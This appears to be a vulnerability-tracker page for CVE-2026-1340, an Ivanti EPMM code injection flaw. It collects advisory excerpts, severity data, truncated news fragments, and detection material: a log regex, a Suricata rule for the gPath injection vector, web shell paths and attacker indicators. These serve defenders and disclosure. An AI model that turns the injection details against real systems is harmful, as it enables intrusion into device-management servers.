CVE-2026-1340
published 2026-01-29CVE-2026-1340: A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2026-04-11
Exploited in the wild
EPSS
84.04%
99.7th percentile
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ivanti | endpoint_manager_mobile | <= 12.7.0.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
sigma↗
filter log_type in ("https_request", "https_access", "http_request", "https_access") | alter ... HTTP_Request_URI ... Attempted_command_execution = arrayindex(regextract(_raw_log, "^(?:[^P]*P)+RODUCT=(?:[^\"]*\")(?:GET|POST|PUT)\s+(?:[^=]*=)+gPath([^\s]+)"), 0)- →CVE-2026-1340 exploits the bash script at map-aft-store-url via HTTP GET requests to /mifs/c/aftstore/fob/ endpoints. Monitor for GET requests to this URI prefix on EPMM appliances. ↗
- →Look for the gPath parameter in HTTP request URIs in EPMM logs, which is the injection vector for command execution in both CVE-2026-1281 and CVE-2026-1340. ↗
- →85% of exploitation payloads use OAST DNS callbacks to verify command execution (blind RCE verification). Detect outbound DNS queries from EPMM servers to unknown/random subdomains as a sign of successful exploitation. ↗
- →Dormant JSP web shells (401.jsp, 403.jsp, 1.jsp) are deployed at /mi/tomcat/webapps/mifs/. Scan for unexpected JSP files in this directory, especially those requiring a specific trigger parameter to activate. ↗
- →Attackers use sleep commands (e.g., sleep 5) as a time-based blind RCE check. A 5-second delay before a 404 response on EPMM endpoints is a strong indicator of successful RCE. ↗
- →The dominant exploitation source IP 193[.]24[.]123[.]42 (PROSPERO OOO, AS200593) is absent from widely circulated IOC lists. Block and alert on traffic from this IP and AS200593 on EPMM-facing infrastructure. ↗
- →Published IOC lists for this campaign include Windscribe VPN exit node IPs that show zero Ivanti EPMM exploitation activity; those IPs are scanning Oracle WebLogic on port 7001. Do not rely solely on circulated IOC lists for detection. ↗
- ·CVE-2026-1340 and CVE-2026-1281 share the same root cause (unsafe bash script usage) but reside in two distinct scripts handling different features (map-appstore-url vs. map-aft-store-url). Patches are version-specific, not vulnerability-specific — apply the correct RPM for your EPMM version. ↗
- ·Dormant web shells are designed to survive patching. Organizations should review their EPMM appliances for signs of compromise even after applying the patch, as backdoors may already be present. ↗
- ·The sleeper shells at /mifs/403.jsp require a specific trigger parameter to activate and show no follow-on exploitation at time of reporting. Compromised systems may appear unaffected while the implant waits. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wv3p-w5rj-f5p6: A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution
ghsa_unreviewed·2026-01-30
CVE-2026-1340 [CRITICAL] CWE-94 GHSA-wv3p-w5rj-f5p6: A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
VulnCheck
Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
vulncheck·2026·CVSS 9.8
CVE-2026-1340 [CRITICAL] CWE-94 Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
Ivanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability that could allow attackers to achieve unauthenticated remote code execution.
Affected: Ivanti Endpoint Manager Mobile (EPMM)
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://tracker.crowdsec.net/cves/CVE-2026-1340; https://defusedcyber.com/ivanti-epmm-sleeper-shells-403jsp; https://www.greynoise.io/blog/active-ivanti-exploitation; https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/; https://www.recordedfuture.com/blog/january-2026-cve-landscape; https://github
VulnCheck
Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
vulncheck·2026·CVSS 9.8
CVE-2026-1281 [CRITICAL] CWE-94 Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
Ivanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability that could allow attackers to achieve unauthenticated remote code execution.
Affected: Ivanti Endpoint Manager Mobile (EPMM)
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-01-31&host_type=
CISA
Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
cisa·2026-04-08·CVSS 9.8
CVE-2026-1340 [CRITICAL] CWE-94 Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
Vulnerability: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
Affected: Ivanti Endpoint Manager Mobile (EPMM)
Ivanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability that could allow attackers to achieve unauthenticated remote code execution.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: Please adhere to Ivanti's guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Ivanti products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as possible. For more information please see: https://hub.ivanti.com/s/a
Ivanti
Ivanti Security Advisory: CVE-2026-1340
vendor_ivanti·2026-01-29·CVSS 9.8
CVE-2026-1340 [CRITICAL] CWE-94 Ivanti Security Advisory: CVE-2026-1340
Ivanti Security Advisory: CVE-2026-1340
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
CVE IDs: CVE-2026-1340
CVSS Base Score: 9.8
Severity: CRITICAL
CWEs: CWE-94
CISA
Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
cisa·2026-01-29·CVSS 9.8
CVE-2026-1281 [CRITICAL] CWE-94 Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
Vulnerability: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
Affected: Ivanti Endpoint Manager Mobile (EPMM)
Ivanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability that could allow attackers to achieve unauthenticated remote code execution.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: Please adhere to Ivanti's guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Ivanti products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as possible. For more information please: see: https://forums.ivanti.com
Suricata
ET WEB_SPECIFIC_APPS Ivanti Endpoint Manager Mobile Unauthenticated Remote Code Execution (CVE-2026-1281 & CVE-2026-1340)
suricata·2026-01-30·CVSS 9.8
CVE-2026-1281 [CRITICAL] ET WEB_SPECIFIC_APPS Ivanti Endpoint Manager Mobile Unauthenticated Remote Code Execution (CVE-2026-1281 & CVE-2026-1340)
ET WEB_SPECIFIC_APPS Ivanti Endpoint Manager Mobile Unauthenticated Remote Code Execution (CVE-2026-1281 & CVE-2026-1340)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Ivanti Endpoint Manager Mobile Unauthenticated Remote Code Execution (CVE-2026-1281 & CVE-2026-1340)"; flow:established,to_server; http.uri; content:"/mifs/c/"; startswith; content:"/fob/3/"; distance:0; content:"sha256|3a|"; distance:0; content:"st|3d|theValue"; fast_pattern; distance:0; content:"h|3d|"; pcre:"/^(?:gPath|ret)(?:\x5b|\x25(?:25)?5[bB])(?:(?!\x25(?:25)?5[dD]|\x5d).)+(?:[\x3b\x24\x26\x60\x7c]|\x25(?:3[bB]|2[46]|60|7[cC]))/R"; reference:url,labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/; reference:cve,2026-1281; ref
Bleepingcomputer
CISA gives feds four days to patch Ivanti flaw exploited as zero-day
blogs_bleepingcomputer·2026-05-08·CVSS 9.8
CVE-2026-6973 [CRITICAL] CISA gives feds four days to patch Ivanti flaw exploited as zero-day
## CISA gives feds four days to patch Ivanti flaw exploited as zero-day
## Sergiu Gatlan
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given U.S. federal agencies four days to secure their networks against a high-severity vulnerability in Ivanti Endpoint Manager Mobile (EPMM) that has been exploited in zero-day attacks.
Tracked as CVE-2026-6973, this security flaw allows attackers with administrative privileges to execute arbitrary code remotely on systems running EPMM 12.8.0.0 and earlier.
In a Thursday security advisory , Ivanti told customers they can secure their appliances by installing Ivanti EPMM 12.6.1.1, 12.7.0.1, and 12.8.0.1, and advised them to review accounts with Admin rights and rotate those credentials where necessary.
"At the time of disclosure,
Bleepingcomputer
Ivanti warns of new EPMM flaw exploited in zero-day attacks
blogs_bleepingcomputer·2026-05-07·CVSS 8.8
CVE-2026-6973 [HIGH] Ivanti warns of new EPMM flaw exploited in zero-day attacks
## Ivanti warns of new EPMM flaw exploited in zero-day attacks
## Sergiu Gatlan
Ivanti warned customers today to patch a high-severity remote code execution vulnerability in Endpoint Manager Mobile (EPMM) exploited in zero-day attacks.
The security flaw (tracked as CVE-2026-6973) stems from an Improper Input Validation weakness that allows remote attackers with administrative privileges to execute arbitrary code on targeted systems running EPMM 12.8.0.0 and earlier.
Ivanti says customers can mitigate the zero-day by installing Ivanti EPMM 12.6.1.1, 12.7.0.1, and 12.8.0.1, and advises customers to review accounts with Admin rights and rotate those credentials where necessary.
"At the time of disclosure, we are aware of very limited exploitation of CVE-2026-6973, which requires admin au
Unit42
Threat Brief: Exploitation of PAN-OS Captive Portal Zero-Day for Unauthenticated Remote Code Execution
blogs_unit42·2026-05-07·CVSS 9.3
CVE-2026-0300 [CRITICAL] Threat Brief: Exploitation of PAN-OS Captive Portal Zero-Day for Unauthenticated Remote Code Execution
## Threat Brief: Exploitation of PAN-OS Captive Portal Zero-Day for Unauthenticated Remote Code Execution
Justin Moore
Unit 42
Published: May 6, 2026
High Profile Threats
Vulnerabilities
CVE-2026-0300
EarthWorm
PAN-OS
Remote Code Execution
ReverseSocks5
Vulnerability
Zero-day
## Executive Summary
On May 6, 2026, Palo Alto Networks released a security advisory for CVE-2026-0300 , identifying a buffer overflow vulnerability in the User-ID™ Authentication Portal (aka Captive Portal) service of Palo Alto Networks PAN-OS software. Vulnerable systems allow an unauthenticated attacker to execute arbitrary code with root privileges on the PA-Series and VM-Series firewalls by sending specially crafted packets.
We are aware of only limited exploitation of CVE-2026-0300 at this time
Hackernews
Ivanti EPMM CVE-2026-6973 RCE Under Active Exploitation Grants Admin-Level Access
blogs_hackernews·2026-05-07·CVSS 9.8
CVE-2026-6973 [CRITICAL] Ivanti EPMM CVE-2026-6973 RCE Under Active Exploitation Grants Admin-Level Access
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## Ivanti EPMM CVE-2026-6973 RCE Under Active Exploitation Grants Admin-Level Access
Ivanti is warning that a new security flaw impacting Endpoint Manager Mobile (EPMM) has been explored in limited attacks in the wild.
The high-severity vulnerability, CVE-2026-6973 (CVSS score: 7.2), is a case of improper input validation affecting EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1.
It allows "a remotely authenticated user with administrative access to achieve remote code execution," Ivanti said in an advisory released today.
"We are aware of a very limited number of customers exploited with CVE-2026-6973. Successful explo
Unit42
Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years
blogs_unit42·2026-05-05·CVSS 7.8
CVE-2026-31431 [HIGH] Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years
## Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years
Justin Moore
Published: May 5, 2026
High Profile Threats
Vulnerabilities
Containers
CVE-2026-31431
Kubernetes
Linux
Local privilege escalation
Page cache
Vulnerability
## Executive Summary
On April 29, 2026, researchers publicly disclosed a highly reliable local privilege escalation (LPE) vulnerability tracked as CVE-2026-31431 . This vulnerability is commonly referred to as Copy Fail. Discovered in about an hour through an AI-assisted process , this logic flaw allows an unprivileged local attacker to consistently escalate their access to root across virtually all major Linux distributions released since 2017.
Unlike many kernel vulnerabilities, this logic flaw is deterministic, meaning it does
Unit42
A Deep Dive Into Attempted Exploitation of CVE-2023-33538
blogs_unit42·2026-04-16·CVSS 8.8
CVE-2023-33538 [HIGH] A Deep Dive Into Attempted Exploitation of CVE-2023-33538
## A Deep Dive Into Attempted Exploitation of CVE-2023-33538
Asher Davila
Malav Vyas
Chris Navarrete
Published: April 16, 2026
Threat Research
Vulnerabilities
Botnet
Command injection
CVE-2023-33538
Mirai
WiFi routers
## Executive Summary
We identified active, automated scans and probes attempting to exploit CVE-2023-33538 , a vulnerability in several end-of-life TP-Link Wi-Fi router models:
TL-WR940N v2 and v4
TL-WR740N v1 and v2
TL-WR841N v8 and v10
The observed payloads are malicious binaries characteristic of Mirai-like botnet malware, which the exploits attempt to download and execute on vulnerable devices.
We observed this activity after the Cybersecurity and Infrastructure Security Agency’s (CISA) June 2025 addition of this CVE (Common Vulnerabilities and Exposu
Checkpoint
13th April – Threat Intelligence Report
blogs_checkpoint·2026-04-13
CVE-2026-1340 13th April – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 13th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 13th April, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
The Los Angeles Police Department has reported a data breach involving a digital storage system used by the L.A. City Attorney’s Office. The exposure included 7.7 terabytes and more than 337,000 files, including personnel records, internal affairs material, and unredacted personal information.
ChipSoft, a Dutch healthcare sof
Bleepingcomputer
CISA orders feds to patch exploited Ivanti EPMM flaw by Sunday
blogs_bleepingcomputer·2026-04-08·CVSS 9.8
CVE-2026-1340 [CRITICAL] CISA orders feds to patch exploited Ivanti EPMM flaw by Sunday
## CISA orders feds to patch exploited Ivanti EPMM flaw by Sunday
## Sergiu Gatlan
CISA has given U.S. government agencies four days to secure their systems against a critical-severity vulnerability in Ivanti Endpoint Manager Mobile (EPMM) that has been exploited in attacks since January.
Tracked as CVE-2026-1340 , this critical-severity code injection flaw enables threat actors without privileges to gain remote code execution on Internet-exposed and unpatched EPMM appliances.
Ivanti flagged this and a second security bug (CVE-2026-1281) as abused in zero-day attacks when it released security updates on January 29 to patch both vulnerabilities and "strongly" encouraged all customers to update their systems to block ongoing exploitation.
"Successful exploitation could lead to unauthent
Recorded Future
January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
blogs_recorded_future·2026-02-24·CVSS 7.8
[HIGH] January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
## January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
January 2026 saw a modest 5% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 23 vulnerabilities requiring immediate remediation, up from 22 in December 2025. Noteworthy trends last month included Russian state-sponsored exploitation of a Microsoft Office zero-day and critical authentication bypass flaws affecting enterprise infrastructure.
What security teams need to know:
APT28's Operation Neusploit: Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants
Microsoft and SmarterTools lead concerns: These vendors accounted
Unit42
VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)
blogs_unit42·2026-02-19·CVSS 9.9
CVE-2026-1731 [CRITICAL] VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)
Threat Research Center
High Profile Threats
Vulnerabilities
## VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)
Justin Moore
Published: February 19, 2026
High Profile Threats
Vulnerabilities
Bash
CVE-2026-1731
PowerShell
Remote Access Trojan
Remote Code Execution
SparkRAT
VShell
## Executive Summary
On Feb. 6, 2026, BeyondTrust released a security advisory regarding CVE-2026-1731 . BeyondTrust is an identity and access management platform. This specific vulnerability involves a pre-authentication remote code execution (RCE) issue within BeyondTrust remote support software. It could allow attackers to execute operating system commands in the context of the site user, which may lead to system compromise, including unauthor
Unit42
Critical Vulnerabilities in Ivanti EPMM Exploited
blogs_unit42·2026-02-17·CVSS 9.8
CVE-2026-1281 [CRITICAL] Critical Vulnerabilities in Ivanti EPMM Exploited
Threat Research Center
High Profile Threats
Vulnerabilities
## Critical Vulnerabilities in Ivanti EPMM Exploited
Justin Moore
Published: February 17, 2026
High Profile Threats
Vulnerabilities
CVE-2026-1281
CVE-2026-1340
Ivanti
Remote Code Execution
Reverse shells
## Executive Summary
Two critical zero-day vulnerabilities ( CVE-2026-1281 and CVE-2026-1340 ) affecting Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited in the wild, affecting enterprise mobile fleets and corporate networks. These vulnerabilities allow unauthenticated attackers to remotely execute arbitrary code on target servers, granting them full control over mobile device management (MDM) infrastructure without requiring user interaction or credentials.
Unit 42 has observed widespread expl
Unit42
Critical Vulnerabilities in Ivanti EPMM Exploited
blogs_unit42·2026-02-17·CVSS 9.8
CVE-2026-1281 [CRITICAL] Critical Vulnerabilities in Ivanti EPMM Exploited
## Executive Summary
Two critical zero-day vulnerabilities (CVE-2026-1281 and CVE-2026-1340) affecting Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited in the wild, affecting enterprise mobile fleets and corporate networks. These vulnerabilities allow unauthenticated attackers to remotely execute arbitrary code on target servers, granting them full control over mobile device management (MDM) infrastructure without requiring user interaction or credentials.
Unit 42 has observed widespread exploitation of these vulnerabilities, including:
- Establishing a reverse shell
- Installing web shells
- Conducting reconnaissance
- Downloading malware
This campaign also affected the following sectors in the United States, Germany, Australia and Canada:
- State and local governme
Bleepingcomputer
One threat actor responsible for 83% of recent Ivanti RCE attacks
blogs_bleepingcomputer·2026-02-14·CVSS 9.8
CVE-2026-1286 [CRITICAL] One threat actor responsible for 83% of recent Ivanti RCE attacks
## One threat actor responsible for 83% of recent Ivanti RCE attacks
## Bill Toulas
Update: The article initially listed the wrong CVEs. This has now been corrected to list the CVEs: CVE-2026-1286 and CVE-2026-1340
Threat intelligence observations show that a single threat actor is responsible for most of the active exploitation of two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340.
The security issues have been flagged as actively exploited in zero-day attacks in Ivanti's security advisory, where the company also announced hotfixes.
Both flaws received a critical severity rating and allow an attacker to inject code without authentication, leading to remote code execution (RCE) on vulnerable systems.
A single IP address h
Greynoiseio
Active Ivanti Exploitation Traced to Single Bulletproof IP—Published IOC Lists Point Elsewhere
blogs_greynoiseio·2026-02-10
Active Ivanti Exploitation Traced to Single Bulletproof IP—Published IOC Lists Point Elsewhere
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Checkpoint
9th February – Threat Intelligence Report
blogs_checkpoint·2026-02-09
CVE-2026-1281 9th February – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 9th February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 9th February, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Romania’s national oil pipeline operator, Conpet, has suffered a cyberattack that disrupted its IT systems and took its website offline. The company said operational technology, including pipeline control and telecommunications systems, remained fully functional and oil transport continued without interruption. The attack
Bleepingcomputer
European Commission discloses breach that exposed staff data
blogs_bleepingcomputer·2026-02-09
European Commission discloses breach that exposed staff data
## European Commission discloses breach that exposed staff data
## Sergiu Gatlan
The European Commission is investigating a breach after finding evidence that its mobile device management platform was hacked. The Commission said on Friday that it detected traces of a cyberattack targeting infrastructure that manages its staff's mobile devices.
While the attackers may have accessed some staff members' personal information, including names and phone numbers, the Commission has not yet found evidence that their mobile devices were compromised.
"On 30 January, the European Commission's central infrastructure managing mobile devices identified traces of a cyber-attack, which may have resulted in access to staff names and mobile numbers of some of its staff members," it said .
"The Commissi
Tenable
CVE-2026-1281, CVE-2026-1340: Ivanti Endpoint Manager Mobile (EPMM) Zero-Day Vulnerabilities Exploited
blogs_tenable·2026-01-30·CVSS 9.8
[CRITICAL] CVE-2026-1281, CVE-2026-1340: Ivanti Endpoint Manager Mobile (EPMM) Zero-Day Vulnerabilities Exploited
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Unit42
Privileged File System Vulnerability Present in a SCADA System
blogs_unit42·2026-01-30·CVSS 6.5
CVE-2025-0921 [MEDIUM] Privileged File System Vulnerability Present in a SCADA System
Threat Research Center
Threat Research
Vulnerabilities
## Privileged File System Vulnerability Present in a SCADA System
Asher Davila
Malav Vyas
Published: January 30, 2026
Threat Research
Vulnerabilities
CVE-2025-0921
Privilege escalation
SCADA
## Executive Summary
This report details a vulnerability we found in the Iconics Suite, tracked as CVE-2025-0921 with a Medium CVSS score of 6.5. Iconics Suite is the name of a supervisory control and data acquisition (SCADA) system. This system is used for controlling and monitoring industrial processes in different industries including automotive, energy and manufacturing.
In early 2024 we conducted an assessment of Iconics Suite and identified five vulnerabilities. These were for Microsoft Windows versions 10.97.2 and earlier.
Bleepingcomputer
Ivanti warns of two EPMM flaws exploited in zero-day attacks
blogs_bleepingcomputer·2026-01-29·CVSS 9.8
CVE-2026-1281 [CRITICAL] Ivanti warns of two EPMM flaws exploited in zero-day attacks
## Ivanti warns of two EPMM flaws exploited in zero-day attacks
## Lawrence Abrams
Ivanti has disclosed two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340, that were exploited in zero-day attacks.
The flaws are code-injection vulnerabilities that allow remote attackers to execute arbitrary code on vulnerable devices without authentication. Both vulnerabilities have a CVSS score of 9.8 and are rated as critical.
"We are aware of a very limited number of customers whose solution has been exploited at the time of disclosure," warns Ivanti .
Ivanti has released RPM scripts to mitigate the vulnerabilities for affected EPMM versions:
Use RPM 12.x.0.x for EPMM versions 12.5.0.x, 12.6.0.x, and 12.7.0.x
Use RPM 12.x.1.x for EPMM
Unit42
Remote Code Execution With Modern AI/ML Formats and Libraries
blogs_unit42·2026-01-13·CVSS 7.8
CVE-2025-23304 [HIGH] Remote Code Execution With Modern AI/ML Formats and Libraries
Threat Research Center
Threat Research
Vulnerabilities
## Remote Code Execution With Modern AI/ML Formats and Libraries
Curtis Carmony
Published: January 13, 2026
Threat Research
Vulnerabilities
Apple
CVE-2025-23304
CVE-2026-22584
NVIDIA
Python
PyTorch
Salesforce
## Executive Summary
We identified vulnerabilities in three open-source artificial intelligence/machine learning (AI/ML) Python libraries published by Apple, Salesforce and NVIDIA on their GitHub repositories. Vulnerable versions of these libraries allow for remote code execution (RCE) when a model file with malicious metadata is loaded.
Specifically, these libraries are:
NeMo : A PyTorch-based framework created for research purposes that is designed for the development of diverse AI/ML models and complex sys
Unit42
Threat Brief: MongoDB Vulnerability (CVE-2025-14847)
blogs_unit42·2026-01-13·CVSS 8.7
CVE-2025-14847 [HIGH] Threat Brief: MongoDB Vulnerability (CVE-2025-14847)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: MongoDB Vulnerability (CVE-2025-14847)
Justin Moore
Published: January 13, 2026
High Profile Threats
Vulnerabilities
CVE-2025-14847
MongoDB
## Executive Summary
On Dec. 19, 2025, MongoDB publicly disclosed MongoBleed , a security vulnerability ( CVE-2025-14847 ) that allows unauthenticated attackers to leak sensitive heap memory by exploiting a trust issue in how MongoDB Server handles zlib -compressed network messages. This flaw occurs prior to authentication, meaning an attacker only needs network access to the database's default port to trigger it.
Key details of the threat are summarized below:
Vulnerability: CVE-2025-14847 is a critical, unauthenticated memory disclosure vulnerability in Mong
Unit42
Exploitation of Critical Vulnerability in React Server Components (Updated December 12)
blogs_unit42·2025-12-12·CVSS 10.0
CVE-2025-55182 [CRITICAL] Exploitation of Critical Vulnerability in React Server Components (Updated December 12)
Threat Research Center
High Profile Threats
Vulnerabilities
## Exploitation of Critical Vulnerability in React Server Components (Updated December 12)
Justin Moore
Published: December 12, 2025
High Profile Threats
Vulnerabilities
Cobalt Strike
CVE-2025-55182
CVE-2025-66478
Remote Code Execution
Web shells
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Jan. 30, 2025. Please refer to Vercel's website for the latest information.
## Update Dec. 12, 2025
Unit 42 uncovered the previously unseen KSwapDoor. This Linux backdoor was initially mistaken for BPFDoor.
Key features include:
P2P mesh network: Enables multi-hop routing for robust C2 communications
Strong encryption: Uses AES-256-CFB with Diffie-Hellman key exchange
Stealth an
Unit42
You Thought It Was Over? Authentication Coercion Keeps Evolving
blogs_unit42·2025-11-11
You Thought It Was Over? Authentication Coercion Keeps Evolving
Threat Research Center
Threat Research
Vulnerabilities
## You Thought It Was Over? Authentication Coercion Keeps Evolving
Bar Maor
Hila Cohen
Published: November 10, 2025
Threat Research
Vulnerabilities
Mimikatz
PrintNightmare
Privilege escalation
Windows
## Executive Summary
Imagine a scenario where malicious actors don’t need to trick you into giving up your password. They have no need to perform sophisticated social engineering attacks or exploit vulnerabilities in your operating system. Instead, they can simply force your computer to authenticate to an attacker-controlled system, effectively commanding your machine to hand over valuable credentials. This attack method is called authentication coercion.
While authentication coercion attacks such as PrintNightmare beca
Unit42
LANDFALL: New Commercial-Grade Android Spyware in Exploit Chain Targeting Samsung Devices
blogs_unit42·2025-11-07·CVSS 8.8
CVE-2025-21042 [HIGH] LANDFALL: New Commercial-Grade Android Spyware in Exploit Chain Targeting Samsung Devices
Threat Research Center
Threat Research
Vulnerabilities
## LANDFALL: New Commercial-Grade Android Spyware in Exploit Chain Targeting Samsung Devices
Unit 42
Published: November 7, 2025
Threat Research
Vulnerabilities
Android
Apple
CVE-2025-21042
CVE-2025-21043
CVE-2025-43300
CVE-2025-55177
Samsung
## Executive Summary
Unit 42 researchers have uncovered a previously unknown Android spyware family, which we have named LANDFALL. To deliver the spyware, attackers exploited a zero-day vulnerability (CVE-2025-21042) in Samsung’s Android image processing library. The specific flaw LANDFALL exploited, CVE-2025-21042, is not an isolated case but rather part of a broader pattern of similar issues found on multiple mobile platforms.
This vulnerability was actively exploited in the
Unit42
Microsoft WSUS Remote Code Execution (CVE-2025-59287) Actively Exploited in the Wild (Updated November 3)
blogs_unit42·2025-11-03·CVSS 9.8
CVE-2025-59287 [CRITICAL] Microsoft WSUS Remote Code Execution (CVE-2025-59287) Actively Exploited in the Wild (Updated November 3)
Threat Research Center
High Profile Threats
Vulnerabilities
## Microsoft WSUS Remote Code Execution (CVE-2025-59287) Actively Exploited in the Wild (Updated November 3)
Justin Moore
Published: November 3, 2025
High Profile Threats
Vulnerabilities
CVE-2025-59287
Microsoft
Microsoft Vulnerability
Remote Code Execution
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Jan. 30, 2026. Please refer to Microsoft’s website for the latest information.
On Oct. 14, 2025, a critical, unauthenticated remote code execution (RCE) vulnerability was identified in Microsoft's Windows Server Update Services (WSUS), a core enterprise component for patch management. Microsoft's initial patch during the October Patch Tuesday did not fully address the flaw, n
Unit42
When AI Agents Go Rogue: Agent Session Smuggling Attack in A2A Systems
blogs_unit42·2025-10-31
When AI Agents Go Rogue: Agent Session Smuggling Attack in A2A Systems
Threat Research Center
Threat Research
Vulnerabilities
